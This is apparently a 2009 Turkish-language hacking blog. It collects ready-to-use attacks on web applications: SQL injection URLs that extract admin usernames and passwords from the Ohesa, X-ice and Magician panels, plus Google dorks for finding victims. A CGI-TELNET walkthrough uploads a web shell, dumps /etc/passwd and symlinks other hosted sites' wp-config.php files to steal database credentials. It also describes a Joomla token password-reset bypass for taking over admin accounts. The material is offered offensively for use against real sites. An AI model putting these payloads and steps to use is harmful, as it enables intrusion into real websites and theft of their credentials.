20 Ağustos 2009 Perşembe

Ohesa Duyuru PaneLi SqL Injection

#-# Title : Ohese Duyuru PaneLi SqL Injection #-# Script Download : http://www.aspindir.com/goster/5223
#-# exploit: /izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim
http://www.site.com/path/izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim user and passw0rd ! admin paneL : admin/giris.asp
Türk SiteLerini Uyarın, iyi ŞansLar

X-ice News System Remote SqL Injection

Basit bir açık, herkez kullanabilir; fakat Türk webmaster’ların bu açığı kapatması için uyarı notlarınızı bırakmanızı öneririm, çok eski açık ama google’da yüzlerce site var..
X-ice haber, duyuru paneLi açığı
Arama k0du: inurl:devami.asp
Vuln.
Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adminPassword : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
Login : /admin/kontrol.asp
Kaynak:
# milw0rm.org
http://www.milw0rm.com/exploits/3469

2 Ağustos 2009 Pazar

CGI-TELNET

Hedef siteler için kullandığımız bu yöntem gerçekten çok güzel ve iyi sonuçlar veriyor.İlk önce hedef sitenin hostinginden bir ftp veya bir sitesine shell sokarak cgi.pl imizi upload ettikten sonra iş gayet kolay .

cgi.pl chmod 755 yaptıktan sonra .

ls -la

daha sonra cat /etc/passwd bölümünü çekiyoruz metin belgesine copy paste yapıoruz kaydediyoruz

hedef siteler içinn

cd /var/named yapıyoruz siteleri görüyoruz

örnepin hedef siteniz wordpress ise

ln -s /home/siteid/public_html/wp-config.php a.txt ( a .txt niye derseniz configi oraya kaydedecek sizde bir c99 wasıtası ile sql ile baglanıp şifre çekiceksiniz.)

iyi çalışmalar.

Token açığı eski olmasına rağmen hala çok sayıda var.

şimdiki yazımda joomla sitelerinde ciddi bir risk oluşturan token exploitin den bahsedeceğim.
saldırgan(hacker) googlede hedefine ulaşmak için bir site arar ve bu siteyi bulmak için /index.php?option=com_user .dk gibi bir kod kullanır. burada saldırgan danimarka sitelerinde saldırı düzenlemek üzeredir.
saldırgan kendine bir site seçtikden sonra sitenin adından soraki kodları silerek aşağıda ki gibi exploiti kullanır
site.com/index.php?option=com_user&view=reset bunu silib sitenin sonuna /index.php?option=com_user&view=reset&layout=confirm kodunu ekle. ve token açığı kendini gösterir.
açılan ekranı Tırnak işareti ( ' ) ile uyararak şifre sıfırlama ekranını açmaktadır
daha sonra kullancı adı admin şifre de kendi belirlediği şifre ile sisteme girip operasyonunu gerçekleştirebilir.

Magician Blog Açığı [milw0rm]

[»] Script: [ Magician v1.0 ] [»] Language: [ PHP ] [»] home: [ www.4smart.net ] [»] Founder: [ Evil-Cod3r ] [»] Gr44tz to: [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ] [»] Dork: [ "Powered By 4smart" ] [»] Price: [ $300 But i Scanned The Nulled !! ]###########################################################################===[ Exploit SQL ]=== [»] http://www.Site.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--